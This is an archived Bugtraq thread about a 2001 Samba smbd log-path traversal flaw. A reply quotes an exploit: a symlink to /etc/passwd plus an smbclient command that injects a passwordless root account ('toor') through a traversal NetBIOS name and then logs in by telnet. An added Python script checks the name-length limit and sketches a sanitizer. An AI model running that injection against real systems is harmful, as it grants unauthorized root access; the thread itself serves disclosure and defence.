Bugtraq mailing list archives
Re: smbd remote file creation vulnerability
From: Daniel Jacobowitz <dmj+ () andrew cmu edu>
Date: Mon, 2 Jul 2001 14:30:41 -0700
On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
> I was hoping to test this out but haven't been able to, so here goes on theoretical: how to make this exploit a remote one using AFS or other remote file systems. What does this exploit need on the remote side? A symlink; so, on an AFS system, preferably one of a well-known node that most AFS servers would have in their CellServDB, such as andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named x.log, like
>
>   ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
>
> Now make the symlink world readable. Then all you need is UNIXes running Samba in the vulnerable configuration and running AFS:
>
>   smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
>       -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
>   telnet afs.machine
>
> Log in as toor. If root logins aren't allowed, make a dummy account first, log in with that, then make a toor account on top of that and su over to toor.
Remember, the log path must be within 15 characters to fit in a NetBIOS name! You're not going to get anywhere on andrew, or most other AFS paths, with that restriction.

--
Daniel Jacobowitz
Carnegie Mellon University
MontaVista Software
Debian GNU/Linux Developer
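The 15-character limit Daniel points to is easy to check mechanically. The script below is an added example written for this archive page, not code from either poster or from the Samba project. It assumes a log template of /var/log/samba/<netbios name>.log (the thread only says the log path is built from the client-supplied NetBIOS name; the directory and suffix are assumptions), computes the path such a server would open for a given name, reports whether the name fits in a NetBIOS name at all and whether the resulting path escapes the log directory, and shows a hardened sanitizer that strips path separators and dot-dot components before the name reaches the filesystem. The AFS name is the one proposed in the quoted message with its <username> placeholder kept; the short /etc name is constructed for comparison.

```python
import posixpath

# Assumed log template for this example: LOG_DIR/<netbios name>.log.
# The thread states only that the log path is derived from the NetBIOS name.
LOG_DIR = "/var/log/samba"
NETBIOS_NAME_MAX = 15  # a NetBIOS name is 15 characters plus a one-byte suffix


def log_path_for(netbios_name: str, log_dir: str = LOG_DIR) -> str:
    """Path the unpatched server would open: the raw client name is spliced
    into the log file name, so '..' components in the name walk up the tree."""
    return posixpath.normpath(posixpath.join(log_dir, netbios_name + ".log"))


def fits_netbios(netbios_name: str) -> bool:
    """True if the name can be carried in a NetBIOS name field at all."""
    return 0 < len(netbios_name) <= NETBIOS_NAME_MAX


def escapes_log_dir(netbios_name: str, log_dir: str = LOG_DIR) -> bool:
    """True if the computed log path lands outside log_dir."""
    target = log_path_for(netbios_name, log_dir)
    return posixpath.commonpath([log_dir, target]) != log_dir


def sanitize_netbios_name(netbios_name: str) -> str:
    """Hardened form (illustrative, not Samba's actual fix): keep only
    characters legal in a NetBIOS name, which removes '/', '.' and '..',
    then truncate to the NetBIOS limit. Falls back to a fixed name if
    nothing survives, so the log path is always inside log_dir."""
    allowed = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_")
    cleaned = "".join(c for c in netbios_name.upper() if c in allowed)
    return cleaned[:NETBIOS_NAME_MAX] or "UNKNOWN"


def assess(netbios_name: str) -> dict:
    """Summarise what happens to one client-supplied name."""
    return {
        "name": netbios_name,
        "length": len(netbios_name),
        "fits_netbios": fits_netbios(netbios_name),
        "log_path": log_path_for(netbios_name),
        "escapes_log_dir": escapes_log_dir(netbios_name),
        "sanitized_log_path": log_path_for(sanitize_netbios_name(netbios_name)),
    }


if __name__ == "__main__":
    # Constructed inputs: the AFS name from the thread (placeholder kept)
    # and a short traversal that stays within the NetBIOS limit.
    for name in ("../../../afs/andrew.cmu.edu/usr/<username>/x", "../../../etc/x"):
        for key, value in assess(name).items():
            print(f"{key:>20}: {value}")
        print()
```

Run it and the AFS name comes out at 44 characters, far over the 15-character NetBIOS limit, which is exactly why the cross-cell variant cannot be delivered in the name field; a short local traversal does fit, and the path computation shows it leaving the log directory, while the sanitized name always resolves back inside it.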
Current thread:
- Re: smbd remote file creation vulnerability Christopher William Palow (Jul 02)
- Re: smbd remote file creation vulnerability Dan Stromberg (Jul 03)
- Re: smbd remote file creation vulnerability Daniel Jacobowitz (Jul 03)